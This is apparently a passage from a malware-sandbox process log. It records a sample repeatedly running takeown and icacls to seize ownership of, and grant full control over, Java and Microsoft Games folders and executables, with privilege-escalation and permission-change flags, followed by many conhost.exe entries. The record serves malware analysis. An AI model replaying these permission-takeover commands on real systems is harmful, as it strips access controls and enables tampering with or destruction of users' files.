C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale" /grant Administrators:F2⤵PID:1720
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules" /a2⤵PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules" /grant Administrators:F2⤵PID:2556
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale" /a2⤵PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking" /a2⤵PID:2144
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking" /grant Administrators:F2⤵PID:1876
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7" /a2⤵PID:352
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7" /grant Administrators:F2⤵PID:2584
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin" /a2⤵
- Possible privilege escalation attempt
PID:2656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin" /grant Administrators:F2⤵PID:2612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\jabswitch.exe" /a2⤵PID:2028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\jabswitch.exe" /grant Administrators:F2⤵PID:448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\dtplugin" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\dtplugin" /grant Administrators:F2⤵PID:1820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\plugin2" /a2⤵PID:2712
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\plugin2" /grant Administrators:F2⤵PID:1968
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\server" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\server" /grant Administrators:F2⤵PID:1652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib" /grant Administrators:F2⤵PID:536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\amd64" /a2⤵PID:1420
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\amd64" /grant Administrators:F2⤵PID:2464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\applet" /a2⤵PID:2108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\applet" /grant Administrators:F2⤵PID:2932
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\cmm" /a2⤵PID:1776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\cmm" /grant Administrators:F2⤵PID:2828
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\deploy" /a2⤵PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\deploy" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\ext" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\ext" /grant Administrators:F2⤵PID:2440
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\fonts" /a2⤵PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\fonts" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\images" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\images" /grant Administrators:F2⤵PID:2088
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\images\cursors" /a2⤵PID:1656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\images\cursors" /grant Administrators:F2⤵PID:2376
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\jfr" /a2⤵PID:1880
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\jfr" /grant Administrators:F2⤵PID:2788
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\management" /a2⤵PID:2192
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\management" /grant Administrators:F2⤵PID:900
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\security" /a2⤵PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\security" /grant Administrators:F2⤵PID:1152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Africa" /a2⤵PID:1512
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Africa" /grant Administrators:F2⤵
- Modifies file permissions
PID:2280
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America" /a2⤵PID:1200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America" /grant Administrators:F2⤵PID:496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Argentina" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Argentina" /grant Administrators:F2⤵PID:2432
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Indiana" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Indiana" /grant Administrators:F2⤵PID:1820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Kentucky" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Kentucky" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\North_Dakota" /a2⤵
- Modifies file permissions
PID:2332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\North_Dakota" /grant Administrators:F2⤵PID:1212
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Antarctica" /a2⤵PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Antarctica" /grant Administrators:F2⤵PID:2452
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Asia" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Asia" /grant Administrators:F2⤵PID:2068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Atlantic" /a2⤵PID:2776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Atlantic" /grant Administrators:F2⤵PID:696
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Australia" /a2⤵PID:1916
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Australia" /grant Administrators:F2⤵PID:536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Etc" /a2⤵PID:2752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Etc" /grant Administrators:F2⤵PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Europe" /a2⤵PID:228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Europe" /grant Administrators:F2⤵PID:2016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Indian" /a2⤵PID:1736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Indian" /grant Administrators:F2⤵PID:3028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Pacific" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Pacific" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\SystemV" /a2⤵PID:232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\SystemV" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games" /a2⤵PID:1908
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games" /grant Administrators:F2⤵PID:1300
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess" /a2⤵PID:2348
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess" /grant Administrators:F2⤵PID:2024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\Chess.exe" /a2⤵PID:1540
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\Chess.exe" /grant Administrators:F2⤵PID:1188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\de-DE" /a2⤵PID:876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\de-DE" /grant Administrators:F2⤵PID:2368
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\en-US" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\en-US" /grant Administrators:F2⤵PID:2496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\es-ES" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\es-ES" /grant Administrators:F2⤵PID:2484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\fr-FR" /a2⤵PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\fr-FR" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\it-IT" /a2⤵PID:2612
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\it-IT" /grant Administrators:F2⤵PID:2656
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\ja-JP" /a2⤵PID:1468
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\ja-JP" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell" /a2⤵PID:2868
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe" /a2⤵PID:204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\de-DE" /a2⤵PID:2152
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\de-DE" /grant Administrators:F2⤵PID:1396
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\en-US" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\en-US" /grant Administrators:F2⤵PID:2568
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\es-ES" /a2⤵PID:212
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\es-ES" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\fr-FR" /a2⤵PID:2800
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\fr-FR" /grant Administrators:F2⤵PID:1232
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\it-IT" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\it-IT" /grant Administrators:F2⤵PID:1692
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\ja-JP" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\ja-JP" /grant Administrators:F2⤵PID:2092
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts" /a2⤵PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts" /grant Administrators:F2⤵PID:2948
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\Hearts.exe" /a2⤵PID:1888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\Hearts.exe" /grant Administrators:F2⤵PID:1656
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\de-DE" /a2⤵PID:2076
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\de-DE" /grant Administrators:F2⤵PID:1552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\en-US" /a2⤵PID:756
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\en-US" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\es-ES" /a2⤵PID:2972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\es-ES" /grant Administrators:F2⤵PID:1512
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\fr-FR" /a2⤵PID:1216
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1004
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2079209307-68796204473128317217840311332118289709775115278316982791-944969288"1⤵PID:1424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1057068199198919260374205482762000258-12291030974075651121610289178-855506335"1⤵PID:2668
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-859917874-1106310746-10489174718852343611180925555-774350303216189230-1431522188"1⤵PID:2868
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "247994186-354179688-1984392957607599924-569816183-1020987257-165015803-1258370024"1⤵PID:1252
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1506918238448901226-10725913122100519870835013896-16724686149393728661237020314"1⤵PID:608
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2079744833790847670-366953971-1111445809-1272553080140943352937529264936818851"1⤵PID:448
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-158651789219164612641345165042-111420121-808282193-1349579317-809239211-167626142"1⤵PID:1700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "22247988118121321431285761611220191591281325795-852252345445392881821594363"1⤵PID:1476
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "146652647-1286040013-1185198211-1015743114-1295018336-14828941921157000422288841697"1⤵PID:3016
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "123118474-509818090-1079625493-1110834650-131465760433493493216032182801341653546"1⤵PID:2188
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1770576109-569952414-286549936-1742363437-449666280-1754150009-1162904570-1362431491"1⤵PID:2564
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "44935298-9840449461883193053-1595283929-127458173859209140-27557094768996240"1⤵PID:2592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-90302852-205299036261426058010569988721469259800629336011-455544868-135351694"1⤵PID:2932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13104159892004737989198797172689214282116159393691474349102167900832-580509448"1⤵PID:2016
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "81516236411892251612256956615741995361995341595-533731007-12751021892045114619"1⤵PID:232
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-17036667601839870908869570952251843970-16789744351685751231480298152169091529"1⤵PID:2824
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1172934290-1198638988-617795787-1751977735-17859450051842820555-1027505861733383850"1⤵PID:1720
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9402559851668576706-485245147-2118051778-17247813611356366930-1974726853-118108351"1⤵PID:1020
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2083404548-1184003017-386289567145020607810733640821230214330844880635-528591654"1⤵PID:2176
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14678249131127677268-1663419400398895-22974871446477650-1192818602-1411536558"1⤵PID:1676
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1126387705-155780985-359833765706755952-1139570822-1634296018-865203702-766435947"1⤵PID:2968
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1662462060979138493733196909-15767924172654931651537488174212122558-1111307295"1⤵PID:496
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12270627-53836498515477937301953993576-1383287763136492513-1214897100-2093662934"1⤵PID:1648
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-16417776784687387261785806254-837284030-120545143-455147194-96573631-873146359"1⤵PID:484
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "638965675-19478572671981275048225617499-274226905-934379658674354931415503312"1⤵PID:356
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "746135598-936991395-1826552820710229950-241619009-1447495490379522416471827879"1⤵PID:1884
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1422605656-1457853257119673709-838961796-1525011843-296424510-617948905-1519334611"1⤵PID:2364
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1416124003-638536695558741785-1106569024650707432693179613-6971086891217920170"1⤵PID:996
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6323006611348094266-10662649822717842291359074833-1205016983779156600880210076"1⤵PID:2744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1634549526-920929691466162117-13491222241244737351139317035013615715891699042192"1⤵PID:1968
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1657461208-1196587051-328262124181569009-491510583-1375531844-405341667-702325405"1⤵PID:2200
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-4613319510467825521736950302-46948778612383853-238664269573385799-2004012946"1⤵PID:1424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1512246509-1466532599-1755098378551606519-879499797-9387833811530708191-1716620816"1⤵PID:600
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-235819660553768760-7897885731983838852293394961-18952080981883714703899788546"1⤵PID:2752
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1064024793338806552-38584332035586117-196067581-1117919658-245600579-1464539467"1⤵PID:1524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-815898971-997971666-1514494254-9744740449574231421449979468243906244-1240060327"1⤵PID:216
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "11043728631923864587-39030256515492237691382253287-16315245411879056918965863"1⤵PID:1932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12727401261975112407-393719089-261774927-11883194371330153277271597511920493066"1⤵PID:2844
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1546016252717950240-1162525314-1520032167-2042041177-11962259111118664677435122088"1⤵PID:1076
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1495365471920183774-8661430591351650644-18444325706024617676121575411071790579"1⤵PID:3032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "7368229131493893113-69185834817423171591714177996-2061698635-351825808-1522260714"1⤵PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-130150142154718599-526259069642826494105153168623405895-12511578501705070817"1⤵PID:2328
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1839309816-1078681831-1340162150298623420-1039338943-2004250596545846309-529829908"1⤵PID:1408
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-513865925-758141980-63549186614381005341765466781-497354120893028447598128622"1⤵PID:1612
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16695916141940958534-1445063935168556688617746016301495862399-96879597277271446"1⤵PID:1824
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13918023921563915637-127390094157566402514291029541282585999-20613273681249261564"1⤵PID:2292
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1102877118-35565359-1619514497-51723934115566400391308561023909609045-2000263963"1⤵PID:2796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-623961045121017922839282710-15025477807110294-1491103560-691331559386231164"1⤵PID:2144
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15194839121898496213178381287720089646613551415971724927544-1655466528940364774"1⤵PID:2528
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1006837938-1305247149101038816911385067122104509916-1480420545-958492289-1901254632"1⤵PID:2096
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1716423851-2091393702349753089-19021197388762166096332596421143024585-2041830577"1⤵PID:2240
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3267574161214365579-1393335026-1389890258-1042449761131663968200114609486674306"1⤵PID:2360
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "8472420-39082523635384296545641562369650156-1998335554967495899-1630824682"1⤵PID:2956
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12777072751588051462-11090260412077433428599882537-20791408611069085561-1356135309"1⤵PID:1896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17283100501162545781-2107812766584426115-2046127894-982044982-1718436885-873941090"1⤵PID:760
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-212604852013259910881090015137736552304-20338597281225912700-1810949169-146688339"1⤵PID:332
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-685657371-3225146911418467611-722404123-2132242693-2092419927-126356693-553918782"1⤵PID:2900
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17059272710507503404694682813915284901762084745-1101537138-2119417644668372123"1⤵PID:2704
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1185856531162196045-748422121414940547-421262489-1281802011-736533415-1927971406"1⤵PID:1448
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12015975211988313505-1099702464-9701365431635881611-300656674322518092709857435"1⤵PID:1588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1534653838877698834-199162800-2046092381920607668-833855017-341368498-220007505"1⤵PID:3032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9573876041436896984206470165-810600531-12047247771584531889-1131104655-374084103"1⤵PID:888
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1144408273-567563255649632767-1128093990642951483591712101-21316425252118404339"1⤵PID:2444
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1684702728-63634642977713355-160745254-1347362725-3786687271501379281394829278"1⤵PID:2672
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "66597235015530932231495973706-574602778985665830134231547419341777161994062406"1⤵PID:1852
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-867953051-1233466079-20262916951945453172815551867-879665424-15571032842134019120"1⤵PID:1108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-17013892201535510300-1842165170-6209818168709120704156609-299929375-577764073"1⤵PID:2652
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1372806900-110686362911399588361446109122-13838017391749814112-18677968881147408418"1⤵PID:1992
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-69847232133173906-118847264210337976761039571106901297056-3851376881498535924"1⤵PID:1588
-
